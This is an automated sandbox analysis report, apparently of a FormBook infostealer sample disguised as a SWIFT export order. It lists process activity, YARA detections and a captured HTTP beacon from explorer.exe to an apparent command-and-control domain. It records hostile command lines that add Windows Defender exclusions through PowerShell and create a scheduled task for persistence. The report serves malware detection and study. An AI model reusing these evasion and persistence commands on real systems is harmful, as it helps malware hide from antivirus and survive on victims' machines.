Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.5 | 49786 | 209.17.116.163 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Nov 25, 2021 17:32:04.898037910 CET | 7779 | OUT | GET /46uq/?j0=SFN8Rxuh3&3fQ0Khi=IBlQMs5j29CKqlv3/eZQ6Z47udTwmev2IX+bwOiN2E8lumQwhRgtDV6FzU7U1t+cHC/Y HTTP/1.1
Host: www.aarondecker.online
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Nov 25, 2021 17:32:05.017940044 CET | 7781 | IN | HTTP/1.1 400 Bad Request
Server: openresty/1.17.8.2
Date: Thu, 25 Nov 2021 16:32:04 GMT
Content-Type: text/html
Content-Length: 163
Connection: close
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 39 2e 39 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty/1.19.9.1</center></body></html>


                                                          Code Manipulations

                                                          Statistics

                                                          Behavior

                                                          System Behavior

                                                          General

                                                          Start time:17:30:02
                                                          Start date:25/11/2021
                                                          Path:C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe"
                                                          Imagebase:0x7e0000
                                                          File size:669184 bytes
                                                          MD5 hash:FFF91C58119D3CD7F68457E8565F7116
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.263971290.0000000003C7D000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.263971290.0000000003C7D000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.263971290.0000000003C7D000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.264376295.0000000003EE5000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.264376295.0000000003EE5000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.264376295.0000000003EE5000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.263450761.0000000002C71000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.263661342.0000000002DE1000.00000004.00000001.sdmp, Author: Joe Security
                                                          Reputation:low

                                                          General

                                                          Start time:17:30:07
                                                          Start date:25/11/2021
                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe
                                                          Imagebase:0xac0000
                                                          File size:430592 bytes
                                                          MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Reputation:high

                                                          General

                                                          Start time:17:30:08
                                                          Start date:25/11/2021
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7ecfc0000
                                                          File size:625664 bytes
                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          General

                                                          Start time:17:30:10
                                                          Start date:25/11/2021
                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AnsPejV.exe
                                                          Imagebase:0xac0000
                                                          File size:430592 bytes
                                                          MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Reputation:high

                                                          General

                                                          Start time:17:30:10
                                                          Start date:25/11/2021
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7ecfc0000
                                                          File size:625664 bytes
                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          General

                                                          Start time:17:30:11
                                                          Start date:25/11/2021
                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AnsPejV" /XML "C:\Users\user\AppData\Local\Temp\tmp3FD.tmp
                                                          Imagebase:0x1010000
                                                          File size:185856 bytes
                                                          MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          General

                                                          Start time:17:30:13
                                                          Start date:25/11/2021
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7ecfc0000
                                                          File size:625664 bytes
                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          General

                                                          Start time:17:30:15
                                                          Start date:25/11/2021
                                                          Path:C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe
                                                          Imagebase:0x7ff797770000
                                                          File size:669184 bytes
                                                          MD5 hash:FFF91C58119D3CD7F68457E8565F7116
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.352931586.0000000000F20000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.352931586.0000000000F20000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.352931586.0000000000F20000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000000.257794337.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000000.257794337.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000000.257794337.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.353085483.0000000001360000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.353085483.0000000001360000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.353085483.0000000001360000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000000.256828803.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000000.256828803.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000000.256828803.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.352440743.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.352440743.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.352440743.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                          Reputation:low

                                                          General

                                                          Start time:17:30:20
                                                          Start date:25/11/2021
                                                          Path:C:\Windows\explorer.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\Explorer.EXE
                                                          Imagebase:0x7ff693d90000
                                                          File size:3933184 bytes
                                                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000000.310910025.000000000E481000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000000.310910025.000000000E481000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000000.310910025.000000000E481000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000000.291860660.000000000E481000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000000.291860660.000000000E481000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000000.291860660.000000000E481000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          Reputation:high

                                                          General

                                                          Start time:17:30:58
                                                          Start date:25/11/2021
                                                          Path:C:\Windows\SysWOW64\autochk.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\SysWOW64\autochk.exe
                                                          Imagebase:0x1220000
                                                          File size:871424 bytes
                                                          MD5 hash:34236DB574405291498BCD13D20C42EB
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate

                                                          General

                                                          Start time:17:30:59
                                                          Start date:25/11/2021
                                                          Path:C:\Windows\SysWOW64\help.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\SysWOW64\help.exe
                                                          Imagebase:0xd90000
                                                          File size:10240 bytes
                                                          MD5 hash:09A715036F14D3632AD03B52D1DA6BFF
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000014.00000002.504518924.0000000000C00000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000014.00000002.504518924.0000000000C00000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000014.00000002.504518924.0000000000C00000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000014.00000002.501501248.00000000006B0000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000014.00000002.501501248.00000000006B0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000014.00000002.501501248.00000000006B0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000014.00000002.501943863.0000000000900000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000014.00000002.501943863.0000000000900000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000014.00000002.501943863.0000000000900000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          Reputation:moderate

                                                          Disassembly

                                                          Code Analysis
